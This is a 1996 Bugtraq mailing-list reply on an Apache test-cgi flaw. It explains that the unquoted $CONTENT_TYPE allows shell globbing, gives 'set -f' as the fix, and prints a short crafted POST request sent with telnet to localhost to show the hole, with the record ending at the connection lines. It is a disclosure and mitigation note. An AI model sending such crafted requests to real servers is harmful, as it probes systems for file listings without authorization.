Bugtraq mailing list archives

Re: Vulnerability in test-cgi

From: im14u2c () cegt201 bradley edu (Joe Zbiciak)
Date: Tue, 3 Dec 1996 22:17:18 -0600

And then Ed Arnold went and said something like this:

|Another data point for anyone out there running Apache ... test-cgi
|in the apache-1.1.1 distribution already has the required
|
|echo QUERY_STRING = "$QUERY_STRING"

However, it does not have the necessary quotes around the "$CONTENT_TYPE"
string.  Therefore it's still vulnerable in it's default configuration.
Adding "set -f" as the second line of the script closes the hole completely.

(www) frankenstein:~$ (echo POST /cgi-bin/test-cgi HTTP/1.0; echo Content-type: \* ; echo Content-length: 0; echo;
sleep 5) | telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.